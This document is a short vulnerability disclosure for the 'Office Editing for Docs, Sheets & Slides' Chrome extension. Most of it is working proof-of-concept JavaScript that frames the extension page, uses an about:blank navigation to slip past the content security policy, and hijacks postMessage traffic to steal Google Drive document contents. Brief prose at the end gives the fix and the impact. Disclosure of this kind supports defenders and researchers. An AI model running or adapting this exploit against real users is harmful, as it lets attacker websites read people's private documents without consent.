URL: https://chromewebstore.google.com/detail/office-editing-for-docs-s/gbkeegbaiigmenfmjfclcdgdpimamgkj
PoC video: https://youtu.be/r0ajiPGLh0M
msofficeDocId with the doc ID of a pptx/docx file you uploaded to google drivelet msofficeDocId = '1DuGHZhNFjJFCtOXVkA91t5o92Y3BRJ1u';
setInterval(() => {
if (window.f) document.body.removeChild(f);
f = document.createElement('iframe');
f.width = 500;
f.height = 500;
f.src =
'chrome-extension://gbkeegbaiigmenfmjfclcdgdpimamgkj/views/app.html?state=%7B"ids":%5B"' +
msofficeDocId +
'"%5D,"action":"open","resourceKeys":%7B%7D%7D';
document.body.appendChild(f);
let loop = setInterval(() => {
// Wait for iframes to load
if (f.contentWindow.length !== 2) return;
clearInterval(loop);
setTimeout(() => {
f.contentWindow[0].location = 'about:blank';
let loop2 = setInterval(() => {
try {
// Monitor for leaks via onmessage
f.contentWindow[0].onmessage = (e) => {
console.log('Data leaked :) ' + JSON.stringify(e.data));
};
clearInterval(loop2);
} catch {}
}, 0);
// Wait a bit for the sandbox to request document content
}, 600);
}, 0);
// Retry ever 2 seconds
}, 2000);
This issue was fixed by adding frame-ancestors 'self' to the extension_pages content security policy.
Because of an about:blank edge case it’s possible to navigate a nested, nested 3rd party iframe to it and bypass the child’s CSP.
This has resulted in leaking data due to the victim sending sensitive information to a iframe using the * scope that can be hijacked via good navigation timings even with the CSP.
A GitHub issue was opened about this https://github.com/w3c/webappsec-csp/issues/662
Attacker websites can leak data from a user’s google drive if they know the doc id.